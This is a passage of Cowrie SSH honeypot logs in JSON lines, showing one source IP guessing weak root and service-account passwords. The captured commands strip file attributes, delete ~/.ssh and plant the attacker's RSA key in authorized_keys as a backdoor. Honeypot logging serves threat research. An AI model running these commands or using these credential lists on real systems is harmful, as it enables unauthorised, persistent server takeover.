istp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:02.116173Z","src_ip":"212.227.235.229","session":"906ac787a00a"}
{"eventid":"cowrie.login.failed","username":"db2fenc","password":"Welcome1","message":"login attempt [db2fenc/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:23:03.320282Z","src_ip":"212.227.235.229","session":"906ac787a00a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:04.624428Z","src_ip":"212.227.235.229","session":"906ac787a00a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38308,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc2fbce7e556","protocol":"ssh","message":"New connection: 212.227.235.229:38308 (1.2.3.4:22) [session: dc2fbce7e556]","sensor":"my-vps","timestamp":"2025-09-08T22:23:05.126216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:05.127347Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:05.380079Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456~","message":"login attempt [root/Aa123456~] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:23:06.432122Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:23:06.960861Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:23:06.961540Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:23:06.962624Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:07.216217Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:23:07.820478Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:23:07.821298Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:23:08.075586Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:08.076639Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38320,"dst_ip":"1.2.3.4","dst_port":22,"session":"19d870e1779c","protocol":"ssh","message":"New connection: 212.227.235.229:38320 (1.2.3.4:22) [session: 19d870e1779c]","sensor":"my-vps","timestamp":"2025-09-08T22:23:08.327372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:08.328202Z","src_ip":"212.227.235.229","session":"19d870e1779c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:08.580463Z","src_ip":"212.227.235.229","session":"19d870e1779c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:23:09.632075Z","src_ip":"212.227.235.229","session":"19d870e1779c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:10.887298Z","src_ip":"212.227.235.229","session":"19d870e1779c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38330,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b5efb1e120c","protocol":"ssh","message":"New connection: 212.227.235.229:38330 (1.2.3.4:22) [session: 3b5efb1e120c]","sensor":"my-vps","timestamp":"2025-09-08T22:23:11.253473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:11.254427Z","src_ip":"212.227.235.229","session":"3b5efb1e120c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:11.563254Z","src_ip":"212.227.235.229","session":"3b5efb1e120c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:23:12.842210Z","src_ip":"212.227.235.229","session":"3b5efb1e120c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:13.095995Z","src_ip":"212.227.235.229","session":"dc2fbce7e556"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:13.153087Z","src_ip":"212.227.235.229","session":"3b5efb1e120c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56954,"dst_ip":"1.2.3.4","dst_port":22,"session":"f44ec018aee1","protocol":"ssh","message":"New connection: 212.227.235.229:56954 (1.2.3.4:22) [session: f44ec018aee1]","sensor":"my-vps","timestamp":"2025-09-08T22:23:33.611792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:33.612523Z","src_ip":"212.227.235.229","session":"f44ec018aee1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:33.918752Z","src_ip":"212.227.235.229","session":"f44ec018aee1"}
{"eventid":"cowrie.login.failed","username":"boris","password":"123","message":"login attempt [boris/123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:23:35.179982Z","src_ip":"212.227.235.229","session":"f44ec018aee1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:36.488023Z","src_ip":"212.227.235.229","session":"f44ec018aee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53226,"dst_ip":"1.2.3.4","dst_port":22,"session":"49839dff02fd","protocol":"ssh","message":"New connection: 212.227.235.229:53226 (1.2.3.4:22) [session: 49839dff02fd]","sensor":"my-vps","timestamp":"2025-09-08T22:23:37.262929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:37.725245Z","src_ip":"212.227.235.229","session":"49839dff02fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60536,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe8ea01e4160","protocol":"ssh","message":"New connection: 212.227.235.229:60536 (1.2.3.4:22) [session: fe8ea01e4160]","sensor":"my-vps","timestamp":"2025-09-08T22:23:39.211088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:39.212040Z","src_ip":"212.227.235.229","session":"fe8ea01e4160"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:39.501904Z","src_ip":"212.227.235.229","session":"fe8ea01e4160"}
{"eventid":"cowrie.login.failed","username":"hack","password":"1234567890","message":"login attempt [hack/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T22:23:40.703141Z","src_ip":"212.227.235.229","session":"fe8ea01e4160"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:41.996370Z","src_ip":"212.227.235.229","session":"fe8ea01e4160"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:23:43.037368Z","src_ip":"212.227.235.229","session":"49839dff02fd"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:43.039128Z","src_ip":"212.227.235.229","session":"49839dff02fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34650,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d88581e70a2","protocol":"ssh","message":"New connection: 212.227.235.229:34650 (1.2.3.4:22) [session: 8d88581e70a2]","sensor":"my-vps","timestamp":"2025-09-08T22:24:13.280462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:13.281687Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:13.534544Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme123","message":"login attempt [root/changeme123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:24:14.585211Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:24:15.110553Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:24:15.111316Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:24:15.112423Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:15.367066Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:24:15.972599Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:24:15.973345Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:24:16.228961Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:16.230149Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
